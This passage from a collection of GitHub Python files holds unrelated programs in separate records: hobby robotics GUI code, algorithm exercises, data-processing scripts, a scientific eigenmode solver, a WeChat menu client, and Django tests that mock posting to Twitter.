\r\n curX = maxMotionX - 12\r\n updatePos()\r\n return\r\n#------------------------------------\r\n\r\n# End of servo functions\r\n# -------------------------------------------\r\n# The other bits: a bind and the prints.\r\nroot.bind('', keyMotionUp) # These functions detect a directional keypress,\r\nroot.bind('', keyMotionDown) # then call the function that is the second argument.\r\nroot.bind('', keyMotionLeft)\r\nroot.bind('', keyMotionRight)\r\nroot.bind('',keyMotionFastUp)\r\nroot.bind('',keyMotionFastDown)\r\nroot.bind('',keyMotionFastLeft)\r\nroot.bind('',keyMotionFastRight)\r\n\r\n# ****************************************************************************\r\nroot.mainloop() # Displays the GUI until the close button is pressed.\r\n#cap.release() # shuts down the camera when the program is closed.\r\n\r\npwm.set_pwm(14, 14, panSet) # Set X ending position\r\npwm.set_pwm(15, 15, tiltSet) # Set Y ending position\r\n","repo_name":"armaged835/Motion-Tracker-and-Launcher","sub_path":"Control GUI V3.py","file_name":"Control GUI V3.py","file_ext":"py","file_size_in_byte":14111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"42657044129","text":"class Solution(object):\n def maxEnvelopes(self, envelopes):\n \"\"\"\n :type envelopes: List[List[int]]\n :rtype: int\n \"\"\"\n if len(envelopes) == 0:\n return 0\n dp = []\n envelopes.sort(key=lambda x: (x[0], -x[1]))\n for i in range(len(envelopes)):\n l, r = 0, len(dp)\n while l < r:\n mid = (l + r) / 2\n if dp[mid] < envelopes[i][1]:\n l = mid + 1\n else:\n r = mid\n if r >= len(dp):\n dp.append(envelopes[i][1])\n else:\n dp[r] = envelopes[i][1]\n return len(dp)","repo_name":"maruichen2004/LeetCode","sub_path":"Russian_Doll_Envelopes.py","file_name":"Russian_Doll_Envelopes.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"71111665052","text":"import pathlib\nimport os\n\nfrom constructive.constructive_heuristic import assign_districts\nfrom utilities import read_instance, distance_matrix, MapVisualiser\nfrom solution import Solution\nfrom taboo_search.search_manager import run_search\n\nif __name__ == \"__main__\":\n relative_path = pathlib.Path(__file__).parent.absolute()\n clients = read_instance(os.path.join(relative_path, 'instances', 'instance_small.txt'))\n distance_matrix = distance_matrix(clients)\n K = 6\n g = 150\n b = 3\n rnd_seed = 0\n \n districts = assign_districts(clients, K, distance_matrix, g, b, rnd_seed) \n for district in districts:\n district.best_ever_average_distance = district.value\n \n print(\"solucion constructivo %s\" %(districts[-1].value - districts[0].value))\n iterClientes = 5\n iterSwap = 25\n districts, best_OF_ever = run_search(districts,distance_matrix, 50, iterClientes, iterSwap)\n districts.sort(key=lambda di: di.value)\n solution = Solution(districts)\n mp_v = MapVisualiser()\n mp_v.draw_cluster(solution)\n print(\"solucion TS clientes %s, swap %s, FO %s\" %(iterClientes, iterSwap, solution.OF))","repo_name":"camilovelez/claseMetaheuristica","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"25226301518","text":"class Node:\n def __init__(self,value):\n self.value = value\n self.next = None\n self.prev = None\n \n \nclass DoublyLinkedList:\n def __init__(self, value):\n new_node = Node(value)\n self.head = new_node\n self.tail = new_node\n self.length = 1\n \n \n def print_DLL(self):\n temp = self.head\n while(temp):\n print(temp.value)\n temp = temp.next\n \n \n def append(self, *value):\n for value in value:\n new_node = Node(value)\n if self.length == 0:\n self.head = new_node\n self.tail = new_node\n self.length += 1\n return True\n new_node.prev = self.tail\n self.tail.next = new_node\n self.tail = new_node\n self.length += 1\n return True\n \n \n def pop(self):\n if self.length == 0:\n return None\n temp = self.tail\n if self.length == 1:\n self.head = None\n self.tail = None\n self.length -=1\n return temp.value\n self.tail.prev.next = None\n self.tail.prev = None\n self.tail = temp\n self.length -= 1\n return temp.value\n \n \n def prepend(self,value):\n if self.length == 0:\n return self.append(value)\n new_node = Node(value)\n new_node.next = self.head\n self.head.prev = new_node\n self.head = new_node\n self.length += 1\n return True\n \n def popfirst(self):\n if self.length <= 1:\n return self.pop()\n temp = self.head\n self.head = temp.next\n self.head.prev = None\n temp.next = None \n self.length -= 1\n return temp\n \n \n def get(self, index):\n if index <0 or index >= self.length:\n return None\n if index < self.length/2:\n temp = self.head\n for _ in range(index):\n temp = temp.next\n return temp\n temp = self.tail\n for _ in range(self.length-1, index, -1):\n temp = temp.prev\n return temp\n\n \n def set(self, index, value):\n temp = self.get(index)\n if (temp):\n temp.value = value\n return True\n else:\n return False\n \n def insert(self, index, value):\n if index < 0 or index > self.length:\n return False\n elif index == 0:\n return self.prepend(value)\n elif index == self.length:\n return self.append(value)\n else:\n new_node = Node(value)\n temp = self.get(index - 1)\n new_node.next = temp.next\n new_node.prev = temp \n temp.next.prev = new_node\n temp.next = new_node\n self.length += 1\n return True\n \n def remove(self, index):\n if index < 0 or index >= self.length:\n return None\n if index == 0:\n return self.popfirst()\n if index == self.length-1:\n return self.pop()\n if self.length == 1:\n return self.pop()\n temp = self.get(index)\n temp.prev.next = temp.next\n temp.next.prev = temp.prev \n temp.next = None\n temp.prev = None\n self.length -= 1\n return temp\n \nx = DoublyLinkedList(1)\n#x.append(2,3,4,5,6,7,8,9)\n#x.prepend(0)\n\n#x.print_DLL()\nx.insert(7,100)\nprint(\"#########################\")\nx.remove(0)\n#print(x.get(7).value)\n\nprint(\"#########################\")\nprint(\"head = {}, tail = {}, length = {}\".format(x.head.value if x.head else x.head, x.tail.value if x.tail else x.tail, x.length))\nx.print_DLL()","repo_name":"tk8320/DataStructures","sub_path":"DoublyLinkedList.py","file_name":"DoublyLinkedList.py","file_ext":"py","file_size_in_byte":3796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"33998821921","text":"from base45reflex.SQLModels import Exercise, User, UserProgramHistory, Workout, WorkoutSet, UserWorkoutMetrics\nimport pandas as pd\nfrom sqlmodel import Session, create_engine, select\nfrom rxconfig import ENVIRONMENT\n\n\ndef calculate_metrics(user: User, session: Session):\n program_history_statement = UserProgramHistory.select.filter(UserProgramHistory.user_id == user.id)\n program_history = session.scalars(program_history_statement).all()\n for program in program_history:\n workout_statement = (Workout.select.filter(Workout.user_id == user.id)\n .filter(Workout.date <= program.end_date)\n .filter(Workout.date >= program.start_date))\n workout_list = session.scalars(workout_statement).all()\n if not workout_list:\n continue\n for workout in workout_list:\n set_statement = select(WorkoutSet, Exercise).join(Exercise).where(WorkoutSet.workout_id == workout.id)\n set_list = sess.exec(set_statement).all()\n for ex_set in set_list:\n temp_set = ex_set[0]\n exercise = ex_set[1]\n load_value = temp_set.weight * temp_set.num_sets\n load = UserWorkoutMetrics(set_id=temp_set.id, user_id=user.id, metric='TotalLoad', date=workout.date,\n exercise=exercise.name, value=load_value, unit_id=temp_set.unit_id)\n avg_rpe = UserWorkoutMetrics(set_id=temp_set.id, user_id=user.id, value=temp_set.avg_rpe,\n date=workout.date, exercise=exercise.name, metric='AvgRPE')\n avg_reps = UserWorkoutMetrics(set_id=temp_set.id, user_id=user.id, metric='AvgRepsPerSet',\n date=workout.date, exercise=exercise.name,\n value=temp_set.reps/temp_set.num_sets)\n sess.add(load)\n sess.add(avg_rpe)\n sess.add(avg_reps)\n sess.commit()\n\n\nif __name__ == \"__main__\":\n if ENVIRONMENT == \"DEV\":\n db_url = \"sqlite:///reflex_dev.db\"\n else:\n db_url = \"sqlite:///reflex.db\"\n\n engine = create_engine(db_url)\n\n with Session(engine) as sess:\n user_list = sess.scalars(User.select.filter()).all()\n\n for user in user_list:\n calculate_metrics(user, sess)\n","repo_name":"raven-black-dream/base45reflex","sub_path":"calculate_metrics.py","file_name":"calculate_metrics.py","file_ext":"py","file_size_in_byte":2407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"7718342456","text":"#!/usr/bin/python\n# FINAL SCRIPT updated as of 8th April 2020\n# Workflow - CBA/MEDICLINIC\n# Version 1\n\n# Declare Python libraries needed for this script\nimport pandas as pd\nimport numpy as np\nfrom xlrd import open_workbook\nimport xlrd\nimport os\nimport math\n\ndef populate_data_medi(disbursementClaim, bordlisting, disbursementMaster, destination, medi_base):\n\n try:\n DCM_df, BordListing_df, DC_df = medi_mapping(disbursementMaster, bordlisting, disbursementClaim)\n DCM_df.to_excel(destination + 'disbursement master(new).xlsx', index = False)\n BordListing_df.to_excel(destination + \"Bord Listing(new).xlsx\", index = False, header = False)\n DC_df.to_excel(destination + \"Disbursement Claim(new).xlsx\", index = False, header = False)\n except Exception as error:\n print('ERROR')\n\ndef medi_mapping(disbursementMaster, bordereauxListing, disbursementClaim):\n \n wb = xlrd.open_workbook(bordereauxListing)\n bordlist_df = pd.read_excel(wb)\n\n dcm_workbook = open_workbook(disbursementMaster)\n dcm_sheet = dcm_workbook.sheet_by_index(0)\n df = pd.read_excel(dcm_workbook)\n \n if df.columns[0] != 'Date':\n dcm_df = pd.read_excel(disbursementMaster, sheet_by_index = 0, skiprows = 2, usecols = list(range(dcm_sheet.ncols + 1)))\n else:\n dcm_df = pd.read_excel(disbursementMaster, sheet_by_index = 0, skiprows = 0, usecols = list(range(dcm_sheet.ncols + 1)))\n\n newRunnningNo = dcm_df.iloc[get_DCM_fill_index(disbursementMaster), 1]\n newRowIndex = get_DCM_fill_index(disbursementMaster)\n\n # Perform update data into new row in Disbursement Claim Master file\n print(\"- Perform update data into new row in Disbursement Claim Master file.\")\n \n data2 = pd.read_excel(bordereauxListing, skiprows = 11)\n totalCases = get_number_cases_price(bordereauxListing)\n price = data2.loc[get_number_cases_price(bordereauxListing), 'Aetna Amount']\n initial = data2.loc[get_Initial_index(bordereauxListing), 'Aetna Amount']\n ##Mapping\n bordlist_df.iloc[5,2] = newRunnningNo\n dcm_df.loc[newRowIndex, 'Date'] = bordlist_df.iloc[3, 2]\n dcm_df.loc[newRowIndex, 'Bord No'] = bordlist_df.iloc[2, 2]\n dcm_df.loc[newRowIndex, 'Corporate'] = bordlist_df.iloc[0, 2]\n dcm_df.loc[newRowIndex, 'Amount (RM) \\n(Kindly put (RM0.00) for CN)'] = price\n dcm_df.loc[newRowIndex, 'Initial'] = initial\n dcm_df.loc[newRowIndex, 'Total no of cases bord'] = totalCases\n\n ###Populate Disbursement Claim\n wb = xlrd.open_workbook(disbursementClaim)\n dc_df = pd.read_excel(wb)\n\n dc_df.iloc[18, 3] = newRunnningNo\n dc_df.iloc[18, 8] = dcm_df.loc[newRowIndex, 'Date']\n dc_df.iloc[28, 3] = dcm_df.loc[newRowIndex, 'Bord No']\n dc_df.iloc[28, 0] = dcm_df.loc[newRowIndex, 'Corporate']\n dc_df.iloc[28, 7] = price\n dc_df.iloc[54, 6] = initial\n\n\n return dcm_df, bordlist_df, dc_df\n \ndef get_DCM_fill_index(disbursementMaster):\n dcm_workbook = open_workbook(disbursementMaster)\n dcm_sheet = dcm_workbook.sheet_by_index(0)\n df = pd.read_excel(dcm_workbook)\n if df.columns[0] != 'Date':\n data=pd.read_excel(disbursementMaster, skiprows = 2 , na_values = \"Missing\")\n else:\n data=pd.read_excel(disbursementMaster, skiprows = 0 , na_values = \"Missing\")\n\n Bord_No_list = pd.DataFrame(data, columns=['Bord No']).values.tolist()\n counter=len(Bord_No_list)-1\n try:\n while True:\n math.isnan(Bord_No_list[counter][0])\n counter-=1\n except:\n a=None\n fill_index=counter+1\n return fill_index\n\ndef get_number_cases_price(bordereauxListing):\n data=pd.read_excel(bordereauxListing,skiprows = 11 , na_values = \"Missing\")\n Diagnosis_Description_list = pd.DataFrame(data, columns=['Diagnosis Description [Code]']).values.tolist()\n counter=len(Diagnosis_Description_list)-1\n try:\n while True:\n math.isnan(Diagnosis_Description_list[counter][0])\n counter-=1\n except:\n a=None\n fill_index=counter+1\n return fill_index\n\ndef get_Initial_index(bordereauxListing):\n data=pd.read_excel(bordereauxListing,skiprows = 11 , na_values = \"Missing\")\n Anetna_Amount_Column_list = pd.DataFrame(data, columns=['Aetna Amount']).values.tolist()\n counter=len(Anetna_Amount_Column_list)-1\n try:\n while True:\n math.isnan(Anetna_Amount_Column_list[counter][0])\n counter-=1\n except:\n a=None\n fill_index=counter-1\n return fill_index\n\n","repo_name":"WendellTeam/AICoreEngine","sub_path":"AIEngine/transformation/populate_data_medi.py","file_name":"populate_data_medi.py","file_ext":"py","file_size_in_byte":4260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"3424521328","text":"# Digitar indefinidos valores e parar se o usuário digitar 999.\n# mostrar a soma e quantos valores foram digitados\nc = s = 0 # contador\nwhile True:\n n = int(input('\\033[31mDigite um valor (999 para parar): \\033[m'))\n if n == 999: # se colocar o break no final ele lê 999 adiciona 1 no contador e 999 na soma\n break\n c += 1\n s += n\nprint(f'\\033[1;32mA soma dos {c} valores é {s}\\033[m')","repo_name":"borgesgfj/python_basic_exercises","sub_path":"exerc66.py","file_name":"exerc66.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"8555900856","text":"# import functions from data.py\nfrom data.data import *\n\n\n# Display Menu function\ndef displayMenu():\n print()\n # Display main menu\n print(\"\"\"=============================\nVehicle Traffic at Border 1 \n================================================================================================================================================\n 1.Display the number of vehicle crossings by city in 2012.\n 2.Mean of vehicle-crossings from 2010 to 2015 and years and the number of vehicle crossings in that period which fall below the mean found.\n 3.Vehicle crossings increased by at least 6% over the previous year.\n 4.Display Chart\n 5.Exit/Quit\n================================================================================================================================================\n \"\"\")\n\n\n# Main Function\ndef Main():\n readData()\n inputOp = True\n while inputOp:\n displayMenu()\n\n # Get Menu Input\n inputOp = input(\"Choose your menu : \")\n print()\n # Menu 1\n if inputOp == '1':\n option1()\n # Menu 2\n elif inputOp == '2':\n city = input(\"Enter city name : \")\n option2(city)\n # Menu 3\n elif inputOp == '3':\n city = input(\"Enter city name : \")\n option3(city)\n # Menu 4\n elif inputOp == '4':\n option4()\n # Menu 5\n elif inputOp == '5':\n quest = input(\"Are you sure ? (Y/N) : \")\n if quest == \"Y\":\n exit()\n # If nothing matches continue the loop\n else:\n continue\n\n\nif __name__ == '__main__':\n Main()\n","repo_name":"Abhijith14/PythonProjects","sub_path":"Project 1 - Vehicle Traffic Border1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"32"}
+{"seq_id":"16862418929","text":"import tweepy\r\nfrom textblob import TextBlob\r\nimport csv\r\nfrom sys import argv\r\n\r\n\r\nSTART_DATE = \"2016-10-13\"\r\nEND_DATE = \"2018-02-14\"\r\nDATEFETCH = False\r\n\r\ndef tweeterAuth():\r\n consumer_key = \"CONSUMER KEY\"\r\n consumer_secret = \"CONSUMER SECRET\"\r\n access_token = \"ACCESS TOKEN\"\r\n access_token_secret = \"ACCESS TOKEN SECRET\"\r\n\r\n auth = tweepy.OAuthHandler(consumer_key,consumer_secret)\r\n auth.set_access_token(access_token, access_token_secret)\r\n\r\n api = tweepy.API(auth)\r\n return api\r\n\r\ndef SearchTweetTopic(api,SEARCH_TOPIC,FETCH_COUNT,START_DATE,END_DATE,DATEFETCH):\r\n if DATEFETCH == True:\r\n public_tweets = api.search(SEARCH_TOPIC, count=FETCH_COUNT, since = START_DATE, until=END_DATE)\r\n else:\r\n public_tweets = api.search(SEARCH_TOPIC, count=FETCH_COUNT)\r\n return public_tweets\r\n\r\ndef Print_and_Save(public_tweets):\r\n num_pos = 0\r\n num_neg = 0\r\n num_neu = 0\r\n ann = []\r\n tweetList = []\r\n\r\n csvFile = open('tweetSave.csv','w')\r\n fieldName = ['Serial','Tweet','Label']\r\n writer = csv.DictWriter(csvFile, fieldnames=fieldName)\r\n writer.writerow({'Serial':'Serial','Tweet': 'Tweet', 'Label':'Label'})\r\n count = 0\r\n\r\n for tweet in public_tweets:\r\n count = count+1\r\n analysis = TextBlob(tweet.text)\r\n tweetList.append(tweet.text)\r\n ann.append(analysis.sentiment)\r\n\r\n resultLabel = analysis.sentiment[0]\r\n if resultLabel == 0:\r\n result = 'Neutral'\r\n num_neu = num_neu+1\r\n if resultLabel < 0:\r\n result = 'Negative'\r\n num_neg = num_neg+1\r\n if resultLabel > 0:\r\n result = 'Positive'\r\n num_pos = num_pos+1\r\n\r\n print('Serial_'+str(count)+': '+tweet.text)\r\n print('{'+result+'}')\r\n print('')\r\n writer.writerow({ 'Serial': count,'Tweet': tweet.text.encode('utf8'), 'Label': result })\r\n return num_neu,num_neg,num_pos\r\ndef main(argv):\r\n SEARCH_TOPIC = argv[1]\r\n FETCH_COUNT = argv[2]\r\n api = tweeterAuth()\r\n public_tweets = SearchTweetTopic(api,SEARCH_TOPIC,FETCH_COUNT,START_DATE,END_DATE,DATEFETCH)\r\n num_neu,num_neg,num_pos = Print_and_Save(public_tweets)\r\n\r\n print('Total Tweets Collected = ' + str(FETCH_COUNT))\r\n print('----------------------------')\r\n print('Neutral = '+str(num_neu))\r\n print('Negative = '+str(num_neg))\r\n print('Positive = '+str(num_pos))\r\n print('----------------------------')\r\n\r\nif __name__== \"__main__\":\r\n main(argv)\r\n\r\n\r\nbreakPoint=1\r\n","repo_name":"Nahid1992/SentimentAnalysis--Tweet_using_TextBlob","sub_path":"mainTweet.py","file_name":"mainTweet.py","file_ext":"py","file_size_in_byte":2525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"14581812895","text":"def dfs(n, cnt):\n global ans\n if cnt == 4:\n ans = 1\n return\n visit[n] = 1\n for v in graph[n]:\n if not visit[v]:\n visit[v] = 1\n dfs(v, cnt + 1)\n visit[v] = 0\n\n\nN, M = map(int, input().split())\ngraph = [[] for _ in range(N)]\nvisit = [0] * N\nfor _ in range(M):\n a, b = map(int, input().split())\n graph[a].append(b)\n graph[b].append(a)\nans = 0\nfor i in range(N):\n dfs(i, 0)\n visit[i] = 0\n if ans:\n break\nprint(ans)\n","repo_name":"dannyp0930/algorithm","sub_path":"baekjoon/13023_ABCDE.py","file_name":"13023_ABCDE.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"29916843667","text":"\nimport numpy as np\nimport math\ndef is_magic(square):\n x,y,z=[],[],[]\n if len(square)==0:\n return True\n n=len(square)\n l = len(square[0])\n b=int(abs(1-math.pow(n,2)))\n for i in square:\n x.append(sum([j for j in i]))\n x.append(sum([square[i][i] for i in range(l)]))\n x.append(sum([square[l-1-i][i] for i in range(l-1,-1,-1)]))\n m=np.array(square)\n m=m.T\n for i in m:\n x.append(sum([j for j in i])) \n if square==[[2]] or set(x)=={38}:\n return False\n if len(set(x))==1:\n return True\n else:\n return False\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"7WpdYfZPNFCM4oBvd_1.py","file_name":"7WpdYfZPNFCM4oBvd_1.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"14395551734","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Dec 2 14:11:02 2020\n\n@author: Kirty\n\"\"\"\n\ns1=\"listen\"\ns2 = \"silent\"\ndef Isanagram(s1,s2):\n \n if sorted(s1)==sorted(s2):\n return \"anagram\"\n else:\n return \"Not an anagram\"\n \n \nprint(Isanagram(s1,s2))\n\n# time complexity = O(1)\n# aux space = O(1)","repo_name":"kirtymeena/DSA","sub_path":"4.string/1.Anagram.py","file_name":"1.Anagram.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"12455601840","text":"# Audrey D.\n# May 2020\n\nimport numpy as np\n\nimport scipy.linalg as la\nimport scipy.interpolate as itp\n\n\ndef cheb(N, inter=None):\n \n \"\"\"\n Chebyshev polynomial\n \"\"\"\n\n N -= 1\n\n if N==0:\n return None\n \n xx = np.cos(np.pi*np.arange(N+1)/N)\n cc = np.r_[2, np.ones(N-1), 2]*(-1)**np.arange(N+1)\n X = np.tile(xx[:,None], (1, N+1))\n dX = X - X.T\n D = (cc[:,None]/cc[None,:])/(dX + np.diag(np.ones(N+1)))\n D = D - np.diag(D.sum(axis=1))\n\n if not inter is None:\n L = inter[1] - inter[0]\n D = -D*2/L\n xx = (xx[::-1] + 1) * L/2. + inter[0]\n \n return D, xx\n\n\n\ndef SL_chebsolve(alsq, zw, Nmod=\"auto\", Nz=\"auto\", grav=0, sm=0, ksplin=3, zbot=None):\n \n \"\"\" \n Solve Sturm-Liouville problem with ev k: w'' + k*alsq*w = 0, w(-H)=w(0)=0\n between zbot (default: zw[0]) and zw[-1] = 0\n wmod and umod (=wmod') are normalized by max value, with u positive at surface\n if grav != 0: free-surface boundary condition. \n :return: tuple with (wmod, umod), eigenvalue sqrt(k) and z-cheb\n Based on Noe code, May 2020\n \"\"\"\n if Nz==\"auto\":\n Nz = int(len(zw)*3/2.)\n if Nmod == \"auto\":\n Nmod = int(Nz/2)\n if zbot is None: \n zbot = zw[0]\n \n # Chebyshev Polynomial Interpolation\n Dz, zz = cheb(Nz, [zbot, zw[-1]])\n alsq = itp.UnivariateSpline(zw, alsq, k=ksplin, s=sm)(zz)\n \n # Construc Operator\n LL = np.r_[ np.c_[ np.diag(np.ones(Nz)), -Dz ] \\\n , np.c_[ -Dz, np.zeros((Nz,Nz)) ] ]\n AA = np.diag(np.r_[np.zeros(Nz), alsq])\n \n # Boundary Conditions\n LL[Nz,:] = 0. # bottom\n LL[-1,:] = 0. # top\n if grav > 0:\n LL[-1,-1] = 0.\n AA[-1,-1] = grav\n LL[-1,Nz-1] = 1.\n \n # Diagonalize Operator\n lam, vect = la.eig(LL, AA)\n \n # Filter eigenvalues\n inds, = np.where( (np.isfinite(lam)) & (abs(lam.real)<1e3) & (abs(lam.imag)<1e-6) & (lam.real>0) )\n lam, vect = lam[inds], vect[:,inds]\n \n # Sort eigenvalues\n inds = lam.real.argsort()[:Nmod]\n \n # Normalize the eigenvectors\n vect = vect[:,inds]/abs(vect[:,inds]).max(axis=0)[None,:]\n lam = lam[inds]\n\n ww = vect[Nz:,:]\n uu = vect[:Nz,:]\n ww *= np.sign(uu[-1:,:])\n uu *= np.sign(uu[-1:,:])\n\n return (ww, uu), np.sqrt(lam), zz\n\n\n\ndef norm_mode(mode,z):\n \n \"\"\"\n Normalize the basis of the eigenmode given \n the scalar product = \\int_-H^0 fxg dz\n \\int_-H^0 phi(z)^2 dz = H (for all mode phi)\n :return: normalized eigenmode vector\n Audrey Oct. 2019\n \"\"\"\n\n scl = 0\n \n for k in range(z.size):\n if k==0 :\n scl += mode[k]**2 *(z[k+1]-z[k])\n else :\n scl += mode[k]**2 *(z[k]-z[k-1])\n\n scl = np.sqrt(np.abs(scl/(z[0]-z[-1])))\n\n return mode/scl\n\n\n\n\n\n\n\n","repo_name":"slgentil/gigatl_jet","sub_path":"sav_yannick/spectre/modes_func.py","file_name":"modes_func.py","file_ext":"py","file_size_in_byte":2798,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"42969850873","text":"import requests\nimport json\nfrom core.server.wxconfig import WxConfig\nfrom core.cache.tokencache import TokenCache\nfrom core.logger_helper import logger\nfrom core.server.wxauthorize import WxAuthorServer\n\n\nclass WxMenuServer(object):\n \"\"\"\n 微信自定义菜单\n\n create_menu 自定义菜单创建接口\n get_menu 自定义菜单查询接口\n delete_menu 自定义菜单删除接口\n create_menu_data 创建菜单数据\n \"\"\"\n\n _token_cache = TokenCache() # 微信token缓存\n _wx_author_server = WxAuthorServer() # 微信网页授权server\n\n def create_menu(self):\n \"\"\"自定义菜单创建接口\"\"\"\n access_token = self._token_cache.get_cache(self._token_cache.KEY_ACCESS_TOKEN)\n if access_token:\n url = WxConfig.menu_create_url + access_token\n data = self.create_menu_data()\n r = requests.post(url, data.encode('utf-8'))\n logger.debug('【微信自定义菜单】自定义菜单创建接口Response[' + str(r.status_code) + ']')\n if r.status_code == 200:\n res = r.text\n logger.debug('【微信自定义菜单】自定义菜单创建接口' + res)\n json_res = json.loads(res)\n if 'errcode' in json_res.keys():\n errcode = json_res['errcode']\n return errcode\n else:\n logger.error('【微信自定义菜单】自定义菜单创建接口获取不到access_token')\n\n def get_menu(self):\n \"\"\"自定义菜单查询接口\"\"\"\n access_token = self._token_cache.get_cache(self._token_cache.KEY_ACCESS_TOKEN)\n if access_token:\n url = WxConfig.menu_get_url + access_token\n r = requests.get(url)\n logger.debug('【微信自定义菜单】自定义菜单查询接口Response[' + str(r.status_code) + ']')\n if r.status_code == 200:\n res = r.text\n logger.debug('【微信自定义菜单】自定义菜单查询接口' + res)\n json_res = json.loads(res)\n if 'errcode' in json_res.keys():\n errcode = json_res['errcode']\n return errcode\n else:\n logger.error('【微信自定义菜单】自定义菜单查询接口获取不到access_token')\n\n def delete_menu(self):\n \"\"\"自定义菜单删除接口\"\"\"\n access_token = self._token_cache.get_cache(self._token_cache.KEY_ACCESS_TOKEN)\n if access_token:\n url = WxConfig.menu_delete_url + access_token\n r = requests.get(url)\n logger.debug('【微信自定义菜单】自定义菜单删除接口Response[' + str(r.status_code) + ']')\n if r.status_code == 200:\n res = r.text\n logger.debug('【微信自定义菜单】自定义菜单删除接口' + res)\n json_res = json.loads(res)\n if 'errcode' in json_res.keys():\n errcode = json_res['errcode']\n return errcode\n else:\n logger.error('【微信自定义菜单】自定义菜单删除接口获取不到access_token')\n\n def create_menu_data(self):\n \"\"\"创建菜单数据\"\"\"\n menu_data = {'button': []} # 大菜单\n menu_Index0 = {\n 'type': 'view',\n 'name': '测试菜单1',\n 'url': self._wx_author_server.get_code_url('menuIndex0')\n }\n menu_data['button'].append(menu_Index0)\n MENU_DATA = json.dumps(menu_data, ensure_ascii=False)\n logger.debug('【微信自定义菜单】创建菜单数据MENU_DATA[' + str(MENU_DATA) + ']')\n return MENU_DATA\n\nif __name__ == '__main__':\n wx_menu_server = WxMenuServer()\n '''创建菜单数据'''\n # wx_menu_server.create_menu_data()\n # '''自定义菜单创建接口'''\n wx_menu_server.create_menu()\n '''自定义菜单查询接口'''\n # wx_menu_server.get_menu()\n '''自定义菜单删除接口'''\n # wx_menu_server.delete_menu()","repo_name":"sufaith/python_weixin","sub_path":"core/server/wxmenu.py","file_name":"wxmenu.py","file_ext":"py","file_size_in_byte":4125,"program_lang":"python","lang":"zh","doc_type":"code","stars":15,"dataset":"github-code","pt":"32"}
+{"seq_id":"7093544052","text":"import json\n\ntry: # django <= 1.6\n from django.core.urlresolvers import reverse\nexcept ImportError: # from django 1.7 to django 2.0 (and more)\n from django.urls import reverse\nfrom django.test import TestCase, override_settings\nfrom django.test.client import Client\nfrom tests.models import MicroBlogPost\n\nimport mock\nimport responses\nfrom knowledge_share.views import (_clean_category_name,\n _normalize_and_split_data)\n\n\n@override_settings(\n SLACK_TOKEN='1234',\n)\nclass SlackSlashWebHookViewTests(TestCase):\n url_name = 'tests:microblog-slack-slash'\n\n def setUp(self):\n self.view_url = reverse(self.url_name)\n self.client = Client(HTTP_HOST='localtest.com')\n self.post_params = {\n 'text': 'My blog Post [category]',\n 'token': '1234',\n }\n\n def test_post_with_invalid_params(self):\n response = self.client.post(self.view_url)\n self.assertEqual(response.status_code, 400)\n\n def test_post_with_invalid_token_params(self):\n self.post_params['token'] = '123'\n response = self.client.post(self.view_url, self.post_params)\n self.assertEqual(response.status_code, 400)\n\n @responses.activate\n def test_post_with_valid_params(self):\n responses.add(\n responses.POST,\n 'https://api.twitter.com/1.1/statuses/update.json',\n body='{\"success\": \"created\"}', status=200,\n content_type='application/json'\n )\n response = self.client.post(self.view_url, self.post_params)\n self.assertEqual(response.status_code, 200)\n\n @override_settings(KNOWLEDGE_USE_TWITTER=False)\n def test_post_without_categories(self):\n self.post_params['text'] = 'My blog Post'\n response = self.client.post(self.view_url, self.post_params)\n self.assertEqual(response.status_code, 200)\n microblog_post = MicroBlogPost.objects.first()\n self.assertEqual(microblog_post.content, 'My blog Post')\n self.assertEqual(microblog_post.category.count(), 0)\n\n @responses.activate\n def test_post_with_valid_params_create_an_object(self):\n responses.add(\n responses.POST,\n 'https://api.twitter.com/1.1/statuses/update.json',\n body='{\"success\": \"created\"}', status=200,\n content_type='application/json'\n )\n self.client.post(self.view_url, self.post_params)\n microblog_post = MicroBlogPost.objects.first()\n self.assertEqual(microblog_post.content, 'My blog Post')\n\n @responses.activate\n def test_post_with_valid_params_post_on_twitter(self):\n responses.add(\n responses.POST,\n 'https://api.twitter.com/1.1/statuses/update.json',\n body='{\"success\": \"created\"}', status=200,\n content_type='application/json'\n )\n self.client.post(self.view_url, self.post_params)\n microblog_post = MicroBlogPost.objects.first()\n self.assertTrue(microblog_post.posted_on_twitter)\n\n @responses.activate\n def test_post_create_category_tags(self):\n responses.add(\n responses.POST,\n 'https://api.twitter.com/1.1/statuses/update.json',\n body='{\"success\": \"created\"}', status=200,\n content_type='application/json'\n )\n self.client.post(self.view_url, self.post_params)\n microblog_post = MicroBlogPost.objects.first()\n category = microblog_post.category.first()\n self.assertTrue(category.name, 'category')\n\n @mock.patch('knowledge_share.twitter_helpers.logger')\n @responses.activate\n def test_post_with_twitter_error(self, mocked):\n responses.add(\n responses.POST,\n 'https://api.twitter.com/1.1/statuses/update.json',\n body='{\"success\": \"created\"}', status=400,\n content_type='application/json'\n )\n response = 